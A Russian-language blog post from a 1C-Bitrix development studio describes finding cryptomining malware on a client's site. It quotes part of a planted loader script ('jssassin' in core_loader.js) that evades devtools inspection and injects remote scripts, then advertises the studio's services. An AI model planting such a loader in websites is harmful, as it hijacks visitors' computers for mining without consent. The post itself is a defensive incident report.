phone

Вирусы-майнеры на сайтах

21 июля 2018
751

Всё началось с того, что к нам обратился наш клиент, которому стали поступать от посетителей жалобы на 100% загруженность процессора при посещении сайта. Причем майнер активизировался только на macbook'ах в хроме. На других проектах, где мы встретили данный вирус он работал во всех браузерах. В подобных ситуациях важно не только удалить вредоносный код, но и своевременно выполнять обновление 1С-Битрикс, чтобы закрывать уязвимости системы.

Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js

Примерное содержимое:

;(function(window){
window.jssassin = window.jssassin || {

    config: {
        instpDelay: 400,
        startDelay: 1600
    },
    
    state: {
        scriptsNotLoad: 0,
        init: false
    },
    
    proc: {
            start: function(){},
            destroy: function(){}
        },
    
    inspInterval: undefined,
    
    init: function (
            scripts,
            start,
            destroy
        ) {
        
        if (this.state.init) return;
        this.state.init = true;
        
        var self = this;
        this.checkDevtoolsByConsoleInit(); 
        if (this.isDangerous()) return;
        
        if (typeof start == "function") this.proc.start = start;
        if (typeof destroy == "function") this.proc.destroy = destroy;
        
        
        this.state.scriptsNotLoad = scripts.length;
                                                    
        if (this.state.scriptsNotLoad > 0) {
            scripts.forEach(function(src) {
                var script = document.createElement('script');
                script.src = src;
                script.async = false;
                script.onload = function () {self.onloadScript(script)};
                document.head.appendChild(script);
            });
            
            return;
        }

Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся. В некоторых случаях подобные проблемы возникают из-за устаревших или уязвимых решений, поэтому может потребоваться перенос сайта на Битрикс с более защищённой архитектурой.

Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью — рекомендуем не ограничиваться точечным исправлением, а провести технический аудит сайта, чтобы выявить источник проблемы и закрыть возможные уязвимости.

Почему мы?

Концентрация
Работаем исключительно с 1С-Битрикс и Битрикс24, без других CMS
Опыт в числах
200+ проектов, 85% клиентов сотрудничают с нами годами
Статус
Резиденты ПВТ и бизнес партнёр Битрикс24 и 1С-Битрикс
Скорость
Берёмся за срочные задачи почти сразу, не откладывая их в «очередь»
Прозрачность
Фиксируем бюджет и дедлайны, ведём тайм-трекинг и отчётность
Поддержка
Не бросаем проект. Развиваем и адаптируем под рост бизнеса
поддержка
поддержка

Хотите пообщаться о задаче?

Оставьте нам заявку и мы свяжемся с вами, чтобы определить задачи, фронт работы и стоимость будущего проекта
Оставить заявку

Наши услуги

Мы компания, умеющая не только разрабатывать сайты, но и хорошо выполняем роль субподрядчика на средних и больших проектах. Разрабатываем и внедряем решения на базе 1С-Битрикс / Битрикс24. Всегда боремся за успешное доведение проекта до финала, гибко планируя производственный график.

Разработка сайтов на 1С‑Битрикс
Сделаем крутой сайт для вашего бизнеса с любым функционалом. Корпоративные сайты, сайты-визитки, интернет-магазины, порталы для B2B
Разработка сложных сайтов и проектов
Разрабатываем сложные сайты и веб-системы с индивидуальной архитектурой, интеграциями с 1С, CRM и ERP, а также расчётом на высокую нагрузку.
Разработка веб-приложений
Разрабатываем веб-приложения со сложной логикой, интеграциями и высокими требованиями к производительности.
Интеграция МойСклад и Битрикс24
Интегрируем МойСклад с Bitrix24 и сайтом так, чтобы заказы, остатки и статусы передавались автоматически — без ручной работы и ошибок.
Интернет магазин + CRM
Интеграция интернет-магазина на 1С-Битрикс с CRM Битрикс24: автоматизация заказов, контроль процессов и рост продаж.
Доработка Bitrix24: индивидуальные решения
Сделаем CRM Битрикс24 удобнее: интеграции с сервисами, автоматизация процессов, разработка дополнительного функционала или приложений
Техническая поддержка сайтов на 1С-Битрикс
Быстро решаем задачи и устраняем ошибки. Следим за стабильной работой сайта, обновляем, улучшаем и защищаем его от сбоев. Ваш сайт работает — вы занимаетесь бизнесом
Техническая поддержка и сопровождение CRM Битрикс24
Быстро решаем задачи и устраняем ошибки. Следим за стабильной работой сайта, обновляем, улучшаем и защищаем его от сбоев. Ваш сайт работает — вы занимаетесь бизнесом
Внедрение CRM Битрикс24
Внедрим и настроим Битрикс24 так, чтобы вам было удобно работать. Настроим интерфейс,  автоматизацию, интеграции и всё, что нужно для эффективной работы
Доработка сайтов на 1С-Битрикс
Сделаем CRM Битрикс24 удобнее: интеграции с сервисами, автоматизация процессов, разработка дополнительного функционала или приложений
Перенос данных Битрикс24 из облака в коробку
Перенос Битрикс24 из облачной версии в коробку, импорт данных и настроек.
Перенос сайта с другой CMS/конструктора на Битрикс
Перенесем ваш сайт со всеми данными на CMS 1С-Битрикс. Без ошибок, с сохранением всех данных и с исправлением существующих ошибок.
Сайты на шаблонах АСПРО, разработка и кастомизация 
Использование шаблонов АСПРО позволяет создавать мощные, гибкие и функциональные интернет-магазины, корпоративные сайты и порталы.
Технический аудит сайта
Выявление и исправление технических ошибок, анализ сервера, архитектуры сайта, проверка безопасности и обнаружение уязвимостей.
Интеграции Bitrix24 с сервисами для бизнеса
Подключаем телефонию, мессенджеры, 1С/ERP, маркетплейсы, рассылки, оплату и доставку.
Аудит юзабилити, UX/UI
Анализ сайта с точки зрения пользователя. Проверка удобства использования, выявление ошибок и проблем в отображении элементов.
Разработка дизайна вебсайта
Создание дизайна сайта с нуля, сохранение структуры сайта, учет имеющегося контента.
Редизайн сайта
Редизайн сайта без изменения структуры — обновляем визуал и аккуратно работаем с текущим контентом.
посмотреть все услуги

Наши клиенты

Бренды, проекты которых нам доверяют наши партнеры. Мы работаем с локальными и глобальными компаниями из разных отраслей, что позволяет нашим сотрудникам приобретать уникальный опыт, создавая полнофункциональные решения с учетом особенностей и потребностей бизнеса наших клиентов.

Artox Mitgroup Алло Филдс Глобал Инжиниринг Vizavi керамика Xistore Mulisport roast
Rulez Микроэлектроника 97 Уральский гранит Save carrency Стоматология Стомика mi by Garantis.trade Kudel Sante

Наши новости и публикации

CRM в Беларуси: что показало исследование рынка 2026
CRM в Беларуси: что показало исследование рынка 2026

Узнайте результаты исследования MASMI и возможности внедрения и доработки CRM для бизнеса

5 мая 2026
BANT: как квалифицировать лиды и выстроить управляемые продажи в Bitrix24
BANT: как квалифицировать лиды и выстроить управляемые продажи в Bitrix24

Рассказываем, что такое BANT, почему он не работает как навык и как встроить его в CRM так, чтобы система сама расставляла приоритеты

5 мая 2026
Улучшение UX сайта
Как улучшить UX сайта: 30 способов повысить удобство и конверсию

Как улучшить UX сайта и перестать терять заявки из-за неудобства интерфейса. Разбираем 30 практических способов: от первого экрана и структуры страницы до форм, навигации и мобильной версии.

22 апреля 2026
Посмотреть все новости